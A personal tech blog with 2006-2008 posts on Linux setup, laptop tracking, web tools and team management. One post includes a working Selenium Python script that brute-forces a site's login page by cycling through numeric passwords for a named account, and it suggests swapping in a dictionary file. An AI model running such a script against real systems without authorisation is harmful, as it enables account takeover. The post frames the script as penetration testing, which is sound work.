Tales of a Bitshifter

Adeona. "Toto, I don't thinkpad we're in Kansas anymore."

2008-07-20T22:50:00.002-06:00

The other day I found a snazzy little software tool for tracking a stolen (or interesting) laptop. I usually don't care much about software anymore unless its open source and in this case it is, so guess what?...I care!

Adeona was written by a few students at the University of Washington, which also happens to be the birthplace of another of my favorite little apps, BitTyrant (incidentally both sponsored by one of the same professors there...Go Arvind!!!). It is a surprisingly simple concept for tracking the previous and current digital whereabouts of a roaming laptop.

Adeona does the usual in reporting IP addresses that have been used to connect to the Internet, but most notable is the fact that it stores all data in the OpenDHT network. Basically, this is a massively distributed online storage system that can be written to over Sun RPC or XML RPC, without the use of a specialize DHT client or an access account. What that means essentially, is that access to the OpenDHT system can be fully anonymous. On top of that, Adeona encrypts all data that is stored inside OpenDHT, so that only the cryptographic credentials provided when setting it up can be used to read the data it stores.

I found the service remarkably simple to setup on my Ubuntu Hoardy install. As mentioned here in the Linux install guide, I just had to untar the source code and compile it. I also had to install the libssl-dev package (OpenSSL development), but this was also indicated in the install procedures. Overall it took less than 5 minutes to get up and running. I then emailed myself a copy of the access credentials and we were off to the races.

I was interested to see what was being reported back by the system and how easy it was to retrieve, so I executed the following command as indicated in the documentation, and here are the results (I have removed my actual external IP. Yea I know the rest are there, but if you really wanted to know where I live, I'd probably tell you if you asked.):

compy:~$ /usr/local/adeona/adeona-retrieve.exe -r /usr/local/adeona/resources/ -l /home/bott/downloads/adeona/results/ -s /usr/local/adeona/adeona-retrievecredentials.ost -n 1
Please enter password for Adeona:
*******************************************************************************
* These results are for informational, research and evaluation purposes only. *
* Do not attempt to recover your lost or stolen laptop yourself. *
* If you believe your laptop has been stolen, contact the appropriate *
* law enforcement agency. *
*******************************************************************************

Searching for most recent 1 update(s) in time period [ 07/18/2008,22:54 (MDT) - NOW ]

Connecting to remote storage server...
Trying server 1...please be patient
Succesfully connected to remote storage server

Checking update scheduled on 07/20/2008,22:39 (MDT)
Succesfully retrieved update replica 0
===============================
Retrieved location information:
update time: 07/20/2008,22:39 (MDT)
internal ip: 192.168.1.105
external ip: *.*.*.*
access point: DAYS_INN
Nearby routers:
1 0.902ms 192.168.1.1 (could not resolve)
2 12.265ms 72.8.117.1 (1.117.8.72.dhcp.mstarmetro.net)
3 12.420ms 72.8.79.241 (241.79.8.72.dhcp.mstarmetro.net)
4 12.701ms 72.8.79.26 (V776-cbr02.vw.mstarmetro.net)
5 12.924ms 192.41.84.241 (pub-192-41-84-241.center7.com)
6 13.191ms 63.226.73.73 (slc-edge-10.inet.qwest.net)
7 25.332ms 67.14.32.202 (snj-core-02.inet.qwest.net)
8 25.964ms 205.171.214.46 (sjp-brdr-02.inet.qwest.net)
9 26.452ms 213.248.87.49 (sjo-bb1-link.telia.net)
10 87.022ms 80.91.248.189 (ash-bb1-link.telia.net)
11 163.948ms 213.248.65.209 (ldn-bb2-pos6-0-0.telia.net)
12 177.269ms 80.91.250.148 (hbg-bb1-link.telia.net)
13 200.930ms 80.91.250.133 (bpt-b2-link.telia.net)
14 200.401ms 213.248.79.2 (dante-ic-121273-bpt-b2.c.telia.net)
15 201.348ms 195.111.97.242 (c6513-tengbeth13-3.vh.hbone.hu)
16 202.461ms 195.111.97.102 (sup720-tengbeth2-1.bme.hbone.hu)
17 203.195ms 152.66.0.125 (tge8-1.taz.bme.hu)
18 193.745ms 152.66.0.122 (vlan13.ixion.bme.hu)

===============================

What I did find interesting about the results was the DAYS_INN access point registering in the system. I rarely use my wireless and I guess the last time I did was at a Days Inn a couple months ago when I was out of town for a wedding. Although, to be honest, as much family as we have had over this summer, its kinda starting to feel like one around here too... At any rate, I give Adeona a double thumbs up. Definitely one of the cooler utils I've seen in a while. Although it occurred to me just now that as secure as my password is, the dumbest of criminals may never find their way online with it anyhow. Oh well.

MagicJackin' a VM

2008-06-27T19:47:00.004-06:00

So we all know how giddy I get over bargains (if not, consider this a news flash), and I found a great one the other day. The father of a buddy of mine whom I was chatting with the other day, told me about this snazzy new VOIP service called MagicJack. Basically IT is USB VOIP adapter that cost me ~$50 for a year's worth of service that included the device and free unlimited calling anywhere in the US and Canda (right now the price for an additional year is $20, but I've learned not to buy ahead on service with startup VOIPs). Awesome deal, right?! That's what I said too. I mean I am paying almost $20 a month for my current VOIP line at home. The only question for a tuxraider like me was...how hard would it be to get it working in Linux (I was confident there would be a way to do so)?

Well, after a little bit of probing I discovered that there was no native Linux version of the software...bummer. But I have had to run a Windows VM for a while now so that I could handle a few odd Windows only tasks, so I figured it would be easy to just throw that puppy onto the VM and be off to the races. 'Twas not to be so easy.

I soon discovered that out of the box, VMWare Server does not have entirely stellar USB service when run inside Linux. It is fine for sharing a USB disk, but the MagicJack was fightin' back. So I began to poke around and finally figured out how to get it working inside of a Windows VM on Linux.

Here is my setup:
- Ubuntu 8.04 Hardy Heron Host OS (Should work on any Linux distro just the same)
- VMWareServer 1.0.6 build-91891
- Windows XP VM Guest OS
- MagicJack USB device

The real key to getting this to work was to make sure that the USB device could be shared by the VM and the host machine. Out of the box, my Windows VM could detect it, but it was not able to fully function. Here is what I added to /etc/fstab on the host machine to make it work:

# USB for vmware/vbox
none /proc/bus/usb usbfs devgid=46,devmode=664 0 0

If you are still having problems getting the MagickJack to work on a Windows VM in Ubuntu, I recommend setting the networking on the VM to bridged first and then once it is working set it to NAT.

Now, since I'm the only one who has called my number, I just need someone else to call me up to make it a bargain worth its salt.

Yo, Yo, Yo

2008-06-27T19:33:00.000-06:00

Yo, yo, yo catz. Man it has been a long time since I have blogged here. Basically I think it comes down to one word: "thesis". It is done! In fact that is pretty much old newz these days. I finished it up in December before Christmas, but basically, I haven't felt like composing since then. That, and I've been pretty busy with things at the now not so new job. Anyways just in case you are in the mood for some heavy reading, here is the linky.

iPhone, uPhone, wwwe all Phone

2007-11-09T15:43:00.001-07:00

Well truth is, I don't have an iPhone, but I have friends that do. Yay for me! I happen to have a certain ongoing 4.5 year vendetta/boycott against AT&T for a long string of indifferent offenses against me long ago. I know it sounds like a family feud or something, but if I've ever told you why I will never shop for food at Kneaders, you will understand because its along the same lines. And on top of that, I currently have Verizon, which does not allow SIM card phones on its network, so that rules out the option of hacking an iPhone.

Anyways, yesterday, an iPhone totin' friend of mine came to me with an intriguing question. He happened to have an HTML document that he wanted to view on his iPhone, except for the fact that it was unfortunately sized such that it was very inconvenient to navigate through the iPhone browser. He wanted to be able to access it without a connection to the internet, so he had installed Apache onto his iPhone to be able to serve up the HTML document locally, however there still remained the issue of having to painfully resize each page of the document when viewing it. He had stooped so low that he finally came to me.

My first thought was to utilize some kind of global CSS, but after digging into it, I realized there is no way to do that without having to include the CSS in each file of the document. Not a very sexy solution. As I continued to think about it though, I realized that there must be some way to view the pages through an iframe in a new index page and if necessary, resize the contents of the frame using JavaScript to suit the iPhone medium. My friend had informed me that there was some meta data that could be used to tell the iPhone to resize the contents of a page. So, here's what I came up with (with some tweaks he made once it was on his iPhone).

<span style="font-size:100%;"><html><head>
<title>Standard Works</title>
</head><body>
<meta name="viewport" content="width=320; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
<iframe name="iframeName" id="iframeName" src="realindex.html" marginwidth="0" marginheight="0" style="width: 310px;">
</body></span>

It worked like a charm! Chalk another one up for the nerds. This could even be further enhanced to allow it to be dynamically passed a page to prevent sizing issues in any page being browsed. I'll let someone who actually has an iPhone tackle that.

MyGeeQL

2007-10-28T22:21:00.000-06:00

As a young ambitious coder way back in the day, my very first dynamic web page was written in really awkward PHP with MySQL version point something as the back end persistence. I should really try and dig up that code just for old time's sake. I'm sure its still on a 3.5" "floppy" (they can hold thousands of pages of text...ok, maybe just hundreds) somewhere in my basement. Those were dark days.

Well MySQL has come a long way since then, and I'd be lying if it said its not my defacto now for web development. In fact, I never had any real complaints about it. By the time I was using it for more enterprise level systems, it had caught up in most ways. With the latest major release, MySQL 5.0, glorious enhancements like stored procedures, triggers, views, and transactions were introduced, creating more serious competition for larger commercial vendors. Well I couldn't be more pleased with using it as the back end for an advanced web application. That was, until I found out about google-mysql-tools.

After reading an article the other day that describes a recent announcement that Google will be contributing some of its custom enhancements to the main MySQL code base, I discovered they have already released some fairly slick improvements for utilizing MySQL in a highly available, distributed environment. Since Google is considered by many to be the largest single user of MySQL, and they have successfully solved some rather difficult real-time web issues through their software, I figured this was well worth looking at.

Released as a patch that can be applied to MySQL4 or MySQL5, google-mysql-tools is aptly hosted on the Google Code website, and it offers some really slick enhancements to MySQL run in Linux using the InnoDB table structure. Some of these include partially synchronous replication between master and slave hosts, mirrored binlogs, replication of transactions, asynchronous background IO threads in InnoDB, and the monitoring of database activity on a per user, per table basis. I will definitely be applying this patch in my next MySQL5 install.

The Other Bungee

2007-07-02T22:03:00.000-06:00

Its hard to deny the impact of Bungie on the lives of technies and teenagers everywhere. The makers of one of the best selling video game series in history have all but defined the first person shooter on the XBOX. Bungie Studios, the makers of the Halo series know how to do it right. But look out, there's a new kid in town. Bungee Labs (which by the way is not affiliated with Bungee Studios). And we're talking about something a lot cooler than video games. I know, its hard to fathom such a thing, but true it is.

I first heard about Bungee Labs through a previous co-worker of mine who is now employed there as a quality assurance engineer. He has been telling me how impressive their service is, and the other day he invited me over to see a product demo. Their flagship product bundle Bungee Connect, which debuted at the recent Web 2.0 conference, provides an entirely browser based IDE and development environment for quickly and efficiently creating web based applications. One of its most impressive features is the ability to automatically import any SOAP or REST web service and utilize its full functionality with a few clicks of the mouse. During the demo, in about 5 minutes, the presenter imported the recently announced eBay shopping API (it was unveiled at eBay live about a month ago), and created a custom implementation of it that provided a search for products and subsequently displayed the images, product descriptions, pricing, etc. for the resulting products.

The most impressive part of demo however, was the fact that the IDE (called Bungee Builder) is built using Bungee Connect. As the demo went on I almost forgot it was running inside of a browser because it functions like a full featured client side application. Bungee promises cross-browser compatibility for Builder and all applications it creates in Firefox, IE, and Safari. Another very innovation part of the Bungee service is the actual business model itself. Use of builder and the application development and deployment cycle is completely free, with charges only occurring according to the amount of site usage.

The service is currently in Beta, so there are certainly more changes to come, but I have to say as a web developer, this is a very exciting piece of technology, and one which I look forward to utilizing.

Favicon.ico 404 Errors

2007-06-10T23:44:00.000-06:00

Upon recently perusing the Apache error/access logs within my sys admin dominion I discovered a massive number of 404 errors occurring. This was evidenced by the accessing of a custom 404 page which is redirected to by another default script if what is requested is not found. Since this page was the result of a redirect, in order to determine what URL was causing it, it was necessary to scan the access log to see what had been requested by the same IP just before the 404 page was accessed, thereby indicating what resource was being requested that was triggering the 404 script. After briefly reviewing the access log, it became evident that the culprit was a request for favicon.ico in the root web folder.

Favicon.ico is the default means of displaying a custom icon in the URL bar of most modern web browsers. Most commercial websites populate this image with their corporate logo for further site recognition and customization. If you go to http://www.blogger.com, you will notice that the favicon is the orange blogger "B". Well, apparently most web browser will look for favicon.ico in the root of the web folder of the site being accessed. Because of the custom 404 scheme of the site in question, the lack of this file in said location was causing a 404 to occur. Upon doing a bit of digging, it was discovered that while there was a favicon being used, it was displayed using an alternate JavaScript method (probably for better cross-browser compatibility), and that indeed no favicon.ico file existed in the document root. This was remedied by creating a symlink in the root to the location where the JavaScript solution was pulling the favicon from. This seems to have removed these 404 errors, causing the remaining errors to be more discernible and hopefully easier to address.

Dump stderr to stdout

2007-05-08T23:09:00.000-06:00

I recently discovered the solution to a previously baffling problem I was having with the code deployment tool I have been writing as part of my thesis research. By the way, Doba has graciously allowed me to open source the entire project. You can find it here.

Since the project relies on the execution of SVN commands through the use of the exec() function in PHP to perform actions dictated through the web interface, there are alot of exec() calls made in the performance of duty. The output of these commands is generally captured so that it can be displayed back to the user and logged into the system. I was previously baffled however, why sometimes when an SVN error occurred, that it was not returned as output for the function call, but would instead be written to the Apache error log. That was until, upon discussing the issue with a coworker that we stumbled upon the reason. The SVN client was writing the error to stderr instead of stdout! Hello!

In order to solve the error therefore, and thereby prevent myself from having to mow through a bunch of error logs when something failed, I simply had to make sure and pipe stderr to stdout for any svn commands being executed. Here's what I appended to the end of the command to make it happen:


svncommand 2>&1

Since all of the SVN commands are executed through a central function, adding this pipe for all commands was a cinch. Now any and all errors encountered are properly displayed with the SVN output.

The Flaming Cockroach

2007-05-08T22:45:00.000-06:00

No, it's not some south of the border concoction having to do with Tequila. It does however have to do with debugging in Firefox. In fact, Firebug may be my most favorite Firefox plugin ever. It makes previously tedious web/bowser debugging a cinch. Instead of a massive number of echo() or var_dump() calls, the current contents of any web page element can be easily inspected, including any and all JavaScript and CSS elements. I have found this tool to be invaluable when debugging AJAX calls since it handily displays all AJAX request results.

In addition to the integrated inspector, Firebug also allows the live alteration and debugging of HTML, CSS, and JavaScript. There is also a graphical means of displaying the alignment of CSS elements to help show you how things are aligned, as well as the ability to profile page functionality and the time it takes various components of the page to function. One of Firebug's most helpful pieces of functionality for DHTML and JavaScript rich web applications, is the ability to inspect and edit the DOM, which can be difficult to debug manually.

If you do any significant amount of web development and its not already in your development arsenal, Firebug is really something you should not be without.

Google Codeage

2007-05-07T22:55:00.000-06:00

Recently I went poking around in the "Google extras" section and found some nifty new tools and open source code snippets. Below are some of the highlights:

Send to phone (http://www.google.com/tools/firefox/sendtophone/index.html)
This snazzy Firefox plugin allows you to highlight text to a webpage and then send it via text message to any mobile number. Pretty slick way of sending free text messages to your friends since once you select text, you can edit the message before its sent.

Picasa (http://picasa.google.com/linux/)
This is an older piece of open source Google software, that provides an excellent app for photo management and simple editing. If you haven't ever checked it out, it is really worth it. There is even a Linux version!

Google Maps (http://maps.google.com/maps)
If you're still using Mapquest you are living in the stone ages. Google maps utilizes an AJAX interface to allow real-time scrolling on the map. I've never tried to scroll all the way around the world, but I have a feeling it would work!

Kongolo (http://code.google.com/p/google-kongulo/)
This neat little plugin for Google Desktop allows you to spider and index a specific URL, thereby making it searchable by Google Desktop. It is optimized to allow speedy re-indexing of the site by only handling changes since the last index.

Real Time Syntax Highlighting JavaScript (http://code.google.com/p/rtshjs/)
This is one of the slickest pieces of code I found on the site. It is a piece of JavaScript that will automatically highlight code syntax in an HTML page, based on the programming language used. It will end up looking like the code would appear in an IDE like Eclipse, making it really slick for web pages that embed code snippets.

In compliment to these handy projects and open source code components, there are constantly newly emerging projects that can be tracked on one of the many related Google blogs. A few of my favorites are:

Google Code Blog
Google Web Toolkit Blog
Google Testing Blog (This one is really good!)

Securing the World One Way or Another - Penetration Testing Using Selenium

2007-04-17T16:56:00.000-06:00

Security is a big area of interest for me as techie. There's just nothing like the feeling you get by crafting some clever mechanism to bypass someone's (usually poor) attempts at security, or the exhilaration of successfully tweaking something to make it work other than the way it was intended. On the flip side, it is really a pretty crappy feeling when something has been hacked and you are the one who has to figure out how and create a damage report. I would much rather see things secured from the get-go.

That said, I wanted to share a new tool that I discovered and implemented the other day to do some brute force penetration testing on a website that I was auditing. It is actually a tool used to automate UI testing of web based applications, and was shown to me by a QA buddy of mine. It's called Selenium and is a piece of open-source software built in Java.

There are actually several components to the selenium package that make it a really great automated testing suite. The first of these is called Selenium IDE, and it runs as a firefox plugin allowing you to record and edit selenium test scripts. This is really slick for creating quick and dirty web app tests. There is also another tool called Selenium RC which is what I ended up using for my penetration testing. From the about page: "Selenium Remote Control is a test tool that allows you to write automated web application UI tests in any programming language against any HTTP website using any mainstream JavaScript-enabled browser." That pretty much sums up this glorious piece of software.

To run it, you just fire up the java server process, and then run a test script written one of a number of common scripting languages (that utilizes one of the corresponding selenium interface objects for that language) and the script will fire up a browser and run your tests on the target URL. Languages with current support include Java, .NET, Perl, PHP, Python, and Ruby. There is even support for SSL sites through the clever use of some proxy techniques.

The script I used for my testing was written in python and basically just accessed the target login page, iterating through a list of passwords until it found one that logged in successfully. Since security was very minimal, it didn't take long to succeed. The script itself was very simple as well as you can see:


from selenium import selenium
import unittest, os, time

class Cracker(unittest.TestCase):
   def setUp(self):
       self.selenium = selenium("localhost", 4444, "*firefox /usr/lib/firefox/firefox-bin", "http://www.targeturl.com")
       self.selenium.start()
         
   def test_new(self):
       sel = self.selenium

       user="bryce@targeturl.com"
     
       for i in range(100, 999):
           sel.open("/login.aspx")
           sel.type("username", user)
           sel.type("password", i)
           sel.click("Button1")
           sel.wait_for_page_to_load("30000")
         
           #time.sleep(1)
         
           if sel.is_text_present("Your login credentials were not correct. Please try again"):
               print "Failed, trying password: " + str(i)
           else:
               print "Success, your password is: " + str(i)
               break
         
                     
   def tearDown(self):
       self.selenium.stop()

if __name__ == "__main__":
   unittest.main()

The password domain in this case was fairly small (100-999), but this script could easily be altered to read in a dictionary file or a programmatic list of brute force passwords. With the Selenium RC server process running, all I had to do was fire off the python script (python hackscript.py) and away it ran.

The server can be a little tricky to get running, but I found the instructions in the Tutorial and Troubleshooting Guide to solve any problems I encountered. (If you are running in Linux and you have to update your firefox-bin path, don't forget to reload the PATH variable using 'source ~/.bash_profile). If you would like to run the latest version (this may be necessary if you are using Firefox higher than 2.0) you can find the server.jar file here. Just replace it in the unzipped structure and you should be set.

Ladies and Gentlemen, What You've All Been Waiting For...The Chumby

2007-03-27T21:15:00.000-06:00

If you haven't figured it out yet, I'm have several technical interests. Two of these are security and hacking. Interestingly, the word "hacking" has inherited several definitions in addition to the most commonly known one used to refer to the nefarious and often illegal intrusion of secured computer systems. In a general sense it is basically a creative or ingenious way of modifying something to be used different that what was intended. There's tunnel hacking, life hacking, and of course technology hacking. This creative way of looking at new solutions to problems, even exploiting and enhancing a current solution is more of what I mean when I say that hacking interests me. In particular, I find hardware hacking to be a fascinating subject.

That is exactly why I was so excited about a year or so ago (maybe longer, who knows) when I heard about the Chumby. Its a hardware hacker's dream. Who in the world of personal digital devices is not sick of DRM and other proprietary limitations placed on them through their devices? Chumby is entirely open source which is what makes it so exciting. And not just the software it runs either. In a completely unprecedented move in modern consumer electronics, Chumby Corp has even released the hardware schematics for the device, allowing anyone with the will to improve, enhance, and expand its functionality.

The device contains a 266 MHz ARM processor, 32 MB SDRAM, a 3.5" touch LCD, wireless, and several sensors, runs on Linux, and has been designed to run flash widgets, play mp3's and accomplish several other interesting tasks. Check out their website, which has links to the Chumby forums and wiki, for more info.

International Nerdery

2007-03-27T20:45:00.000-06:00

It's official. I'm international. A quick look today at my Google Analytics page told me so. I have a whole slew of visitors from Europe who have checked out several of my Ubuntu posts among other things. Now I'm just waiting to break into the asian market.

If you've never used Google Analytics before you are missing out on one the best free webmaster tools on the net. Check it out at http://www.google.com/analytics/. In order to use it, all you have to do is insert some JavaScript into your site which helps catalog information about traffic to the site. Provided with the tool is a full site statistics suite that includes reporting on referrers, number of hits, repeat visitors and even geographic locations, to only mention a few.

So, according to analytics at bitshifting.blogspot.com, I am alot more popular than I thought. Inspired by my newly discovered popularity, I have resolved to post more often. That said, the one thing that Google Analytics doesn't really tell me, is what people that visit bitshifting want to see more of. So here's you chance to give me suggestions on what you'd like to see me blog about. Maybe its more of what I spend my free time doing. Maybe its more of what I spend my professional time doing. Maybe you're got a technology related problem. Just post a comment with any feedback or suggestions you may have and I'll work on getting you a response. Here's to all those lonely asian nerds who don't know what they're missing. Yet.

The Myth of the Nazarene Welder

2007-03-10T20:17:00.000-07:00

It's been a while since I've posted. What percentage of my posts start out like that? It must be close to a hundred percent, at least in my mind before I start typing. Well, its March already, so too late to make that a new year's resolution. Maybe I can make it a part of spring fever. We'll see what happens. On to the task at hand however.

Prepare yourself, because I'm about to enter the realm of pointy haired thought and discuss something a manager would talk about. I know this isn't my normal geeky train of thought, but I thinks its worth visiting from time to time. I've had this idea for some time now about the assignment of tasks and how it relates to what I like to call the Myth of the Nazarene Welder.

Whether or not you agree in principle with the religious affiliation, you are most likely at least familiar with the vocational endeavors of the most renowned personage from Nazareth. In case you are not, I'll give it to you straight. Jesus was a carpenter. We'll now set aside all further mention of religious figures and talk about carpentry.

When I was growing up, there was a period of several years when my father, who is a petroleum geologist, used to make yearly trips to Singapore and Malaysia for business. He would return with some fabulous local souvenirs and art pieces, which included some amazingly intricate carvings in some exotic species of hardwood. I remember thinking how much skill and time those must have taken to create. Similarly, I recently attended a display at the local university's art museum by a local artist, Andrew Smith, and his father called "Poetic Kinetics", which was a fascinatingly elaborate display of mechanical pieces that basically consisted of a bunch of scrap metal cleverly welded into moving sculptures. Both of these works demanded my artistic fascinations. Imagine for a moment however, that these two artists were to swap mediums. I'm sure to some extent the results would be similar in their level of detail and artistic nature, but I imagine that neither would have found its way onto my mother's mantel or the floor of a prestigious art museum.

What is the moral of this story then? Let people do what they are good at. It seems to be fairly popular in alot of organizations to try and "let people experience different things" and "increase their skillset" or "become familiar with other parts of the system", which I am certainly not against, but too often I think it is taken to far. It's too much like asking a welder to build a set of stairs. Out of wood. He'll always be one step behind. Like a welder building a set of stairs.

Let me provide an example of this myth in action. Let's say your company has several developers, all hired as either UI developers or back end programmers, but now you have a real need for a Database Administrator. Instead of trying to take one of your current welders and have them perform DB carpentry, you should just go out and hire a DBA! People generally end up in careers that they have chosen and enjoy, and trying to get them to do other things generally results in alot of spinning wheels and usually subpar results. While this often seems like a cheaper alternative, that's part of the myth. In the long run carpenters can't be good welders, and they will either just quit trying or turn out shoddy work indefinitely.

Here's another, not so obvious example. Let's say you have two groups of developers. One group has just completed a system for tacking customer orders within the company. The other, an API used by advanced customers to integrate their websites with your company's. Management decides that parties from both sides need to be familiar with the systems from the other (this is particularly common when the groups involved are single developers) because they are worried about what will happen to the application's knowledge base if one or more developers leaves the company. To effect a transfer of knowledge between the two sides, they decide that incoming defects will be fixed by the opposite party. What's the result?

Well, if the systems are not very complicated (haha that's a hilarious thought!), the new project owners will quickly learn the ins and outs of the system and then everyone will know everything about the entire codebase. That's another part of the myth. The whole reason management worries about losing people is because the systems are sufficiently complicated that doing so would cause alot of downtime to get someone else up to speed. While alot of management's job is to hedge its bets and cover all the bases in the event of disaster, too often in this situation, the drawbacks of this approach are ignored.

The first consequence of living the welding carpenter myth is that there is an immediate loss of productivity as people try to get familiar with their new assignments. Instead of taking the code's original author 15 minutes to find and fix the defect, it takes the new owner 2 hours to fix it, including an hour of time they spend bothering the author with questions about the system and possible reasons for the defect. Consequently, there is also an opportunity cost involved. The more time the new owner spends on the new system, the less they will remember about the system they authored, so in this case there is a double double wammy of productivity loss.

Another issue with this myth is that the real reasoning behind it is to try and prevent knowledge loss if personnel leaves the company. This is certainly inevitable to some extent, but there is an awfully high price being paid to try and mitigate that risk. Is it worth it? I guess it depends on the company's effectiveness at initiating attrition. Certainly they will be better at that if they try and push people to do things that frustrate them or fall outside their skillset (like throwing them into a new foreign code base or project every 6 months).

What then should be done to prevent this perversion of vocational assignment? Instead of trying to hedge the bets of attrition through reassignment that results in double sided inefficiencies, It would be much more efficient to focus all those efforts on a rigorous policy of documentation that prevents knowledge loss as development proceeds. I won't go into detail in this post on my thoughts of how to best incite documentation (I will say that wikis are amazingly effective), but having policies in place that ensure proper systems documentation should tide the knowledge base over until other employees can come up to speed on the insights that were lost by an employee leaving. The second amazingly affective thing that can also be done, is to work harder at not losing employees! No, really. Try it. Better compensation, benefits, or even something as simple as newer hardware, a company game room, or a popcorn machine will go along way towards keeping people around.

Nvidia Kernel Upgrade Woes

2007-01-31T22:01:00.000-07:00

I've spent the last several hours of rather frustrating personal computing time trying to get my Nvidia driver up and running again after doing an apt upgrade that included a new kernel. At first there was just not a version of 'nvidia-glx' linked into the newest kernel package (this was the method I originally used to install the driver), and so I went back to using the crappy 'vesa' driver for a week or so, hoping they would fix the linkage issue. That they did, but I soon discovered that this new version of the driver was incompatible with my graphics card, an apparently now outdated Nvidia 440 Go.

So began my epic journey to install the archived version of my beloved driver. I started out going to the nvidia site http://www.nvidia.com/object/unix.html and downloading the Linux AMD64 driver version 1.0-9631. After checking out the documentation, it all seemed pretty straight forward. That sounds pretty hilarious now. Like I said, the next few hours were spent trying to get it working. At one point I had it installing, but the module would not properly reload upon a reboot, so if I was all set if I wanted to reinstall the driver every time I booted. No thanks.

To make a long story short, I finally found a solution. It appears that the default modules and junk that were installed mostly with 'linux-restricted-modules' were preventing the new module from being properly linked. Here's the enlightening site that provided my blessed solution, http://doc.gwos.org/index.php/BerylOnEdgy

The steps I used are as follows:
1. 'sudo nano /etc/modules'. Add the 'nvidia' module to the list.
2. 'sudo nano /etc/default/linux-restricted-modules-common'. Make sure the file looks like: 'DISABLED_MODULES="nv"
3. Press 'ctrl-alt-F2' to open a new terminal, and enter the following:
sudo apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev
sudo apt-get --purge remove nvidia-glx nvidia-settings nvidia-kernel-common
sudo rm /etc/init.d/nvidia-*
sudo /etc/init.d/gdm stop
sudo sh NVIDIA-Linux-x86-1.0-9631-pkg2.run
sudo nvidia-xconfig --add-argb-glx-visuals
sudo /etc/init.d/gdm start
3. Reboot the computer and it should come up.

It has been stated that this process must be repeated each time the kernel is update, which isn't ideal, but now that I've figured out how to do it, shouldn't be as bad next time.

Oh, and as a side note, I'm back to seeing things in German (see my last post), so this post should be Uber impressive.

Spreken zie deutsch? Uh....no

2007-01-18T20:11:00.000-07:00

It would seem the gods of technology are angry at me. If I had to guess, it would be because I don't spend enough time on the computer in a 24 hour period. I think they want upwards of 20 hours instead of the 18 that I normally spend. Damn them! I knew I should have let the J-dubs in! Oh well, I will just have to weather this one, since I'm pretty much committed to a life of computing. That is, until the Internet fails to take off and becomes obsolete in a few years. Then I'm screwed.

Anyhow, it all started a couple months ago the first time my laptop broke. It had a few nagging issues for a while, and a few of them finally caved in. The power connector failed to power the laptop unless it was balanced in an elaborate sweet spot that involved plugging and unplugging it a dozen times before it could be located. Then the CD/DVD drive stopped reading discs and simply clicked incessantly. Finally, the "e" key broke and was only functional every other time you pushed it. With that, I sent it in for repair since it was still under the extended Circuit City warranty (by the way it is definitely worth it to get an extended laptop warranty, which is usually not the case with other things). This was just after Thanksgiving, and it only took about 2 weeks from the time I sent it in until I got it back. Speedy.

Once I got it back, I spent the next couple weeks reinstalling things, putting beryl onto it, etc, etc. All was well until a couple days before Christmas. My parents were visiting, and I got it out to show my dad around the Linux desktop a bit, and to my horror, the display was dead. And this just days before a week-long trip out to the in-laws on the east coast during which I was planning to get some serious work done. I was not to be however, so I again sent it in for repairs, and again waited another 2 weeks to get it back. It looks like the video card on burned out on the motherboard.

This time when I got it back, I set about trying to unsuccessfully install the wireless driver again. This was mostly caused by the fact that I installed some recommended updates to the system that broke the nvidia-glx video driver and screwed my install. I have it working tolerably, by turning off beryl-manager and installing the nvidia-glx-legacy driver, but the legacy driver causes X to not display on the entire width of my widescreen. I am going to wait and see if the repositories get fixed before diving into some other convoluted way to get the driver working again. In the meantime, still no wireless. Oh well.

The aforemention problems however, are not the strangest of the devilish forces working against me. For nearly the past 2 weeks I have been smack dab in the middle of virtual Deutschland. I started noticing that, upon going to the Google homepage, I was being served in the german language. Logging into Blogger was useless since I don't read freakin' german, and there was no language change link in english! WTFrick!? My first thought was some sort of proxy or spyware, so I started poking around. I discovered that I was getting the same issue from all of my various computers (all running different OSes), so that ruled out the spyware issue. Nothing changed in the settings on the router, and going to www.whatismyip.com revealed the same IP I was getting from my ISP, so that ruled out the possibility of some sort of proxy. That left only one possible cause. Bad geographical IP data on Google's site.

Who's fault it was, I'm not sure. My guess is that my ISP, Mstar, bought a new block of IPs that had not been updated yet in whatever geographical IP database people use on their sites. I called up tech support to report the problem, and the support rep informed me other people had also been having problems. In fact, he said he had been getting pages in Spanish.

Well, to my uber delite, tonight, at least on Google's sites, things seem to be back to english. Woohoo! I guess I can stop thinking about laderhosen now.

Edgy Eft + XGL + Beryl + Java App = Crap

2006-12-20T21:17:00.000-07:00

I have been using Zend Studio for all of my PHP development, pretty much ever since I started working at Doba. As an IDE I find it sub par when compared to Eclipse, my previous IDE of choice, but its remote debugging capabilities are pretty reliable and simple to setup when compared to the PHP plugin for Eclipse (as of a year or so ago when I was playing with it). Supposedly, Zend is supposed to be merging its code with Eclipse so maybe someday we will get the best of both worlds. At any rate, I have found the debugging in Zend and its integration with the server side plugin, to be invaluable when trying to solve tough defects.

I previously had Zend Studio installed on Dapper Drake, and it was fairly easy to get it working, so I figured the same would be the case when I reinstalled Edgy Eft and got Beryl running on it. That's what I get for assuming. I was in for a few surprises.

The first issue I encountered was that the Zend binary for Linux was not finding the proper libraries (most of them libc.so.6) when trying to install in Edgy Eft. A quick search found this article on the Zend support site, which seemed to solve the problem by doing the following to the installer binary:

$ cp ZendStudio-4_2_0.bin ZendStudio-4_2_0.bin.bak

$ cat ZendStudio-4_2_0.bin.bak | \
 sed "s/export LD_ASSUME_KERNEL/#xport LD_ASSUME_KERNEL/" > \
 ZendStudio-4_2_0.bin

$ rm ZendStudio-4_2_0.bin.bak

This allowed me to execute the installer without the missing library issue, but I soon discovered another problem. Now I was getting an error in finding the JRE. I found this posting that showed how to bypass the JRE that is supposed to work with the installer and instead use the one on my system locate in /usr/bin/java. The command to run the installer is as follows:

$ ./ZendStudio-4_2_0.bin LAX_VM /usr/bin/java

Once again, I thought I was in the clear with this one in place, especially when I ran it and the installer seemed to fire up. I was beat down yet again however! Now in the Java swing window that appeared, there was a message saying that the JRE could not be found! Doh! To solve this I went through and installed the J2SE:

$ sudo apt-get install sun-java5-jre sun-java5-plugin

And also the JDK:

$ sudo apt-get install sun-java5-jdk

$ sudo update-java-alternatives -s java-1.5.0-sun

Move /usr/lib/jvm/java-1.5.0-sun to the top of the list in /etc/jvm

Finally the installer was successful when running the installer with the local JRE, and seemed to install successfully. Woohoo!

